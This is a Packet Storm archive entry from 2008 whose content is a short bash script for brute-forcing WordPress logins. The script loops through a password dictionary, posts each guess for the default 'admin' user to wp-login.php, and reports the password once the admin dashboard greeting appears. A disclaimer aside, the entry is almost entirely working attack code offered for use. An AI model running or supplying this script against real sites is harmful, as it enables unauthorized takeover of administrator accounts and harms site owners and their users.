wp-bruteforcer.txt

2008-09-17T00:00:00
ID PACKETSTORM:70071
Type packetstorm
Reporter 0x90
Modified 2008-09-17T00:00:00

Description

                                        
                                            `#!/usr/bin/env bash  
# wordpress BruteForce v1.0  
# coded By 0x90 2008  
# 0x90[at]bsdmail.org  
# I do not take any reponsibilty for what you do with this tool   
# Hopefully it will make your life easier rather then making other   
# peoples lives more difficult!   
  
echo ".::Wordpress BruteForce By 0x90::."  
echo "use a good dictioary rename it to bf_passwords"  
echo  
echo -n "Enter website with full path to wordpress:  
> "  
read site  
  
n=`cat bf_passwords | wc -l`  
for (( i=1; i <= $n; i++));  
do  
#default user is admin  
password=`sed -n "$i"p bf_passwords`  
b=`echo "log=admin&pwd="$password"&wp-submit=Log+In&redirect_to=wp-admin" | lynx -dump -nolist -post_data ""$site"/wp-login.php" | grep -o "Howdy, admin"`  
  
echo trying password $password  
  
if [ ! -z "$b" ]; then  
  
echo "Bengo WebSite "$site" password is: "$password""  
echo "Have Fun ;)"  
exit 0  
fi  
done  
echo  
echo "brute force complete"  
echo "no luck, try better dictionary"  
exit  
  
`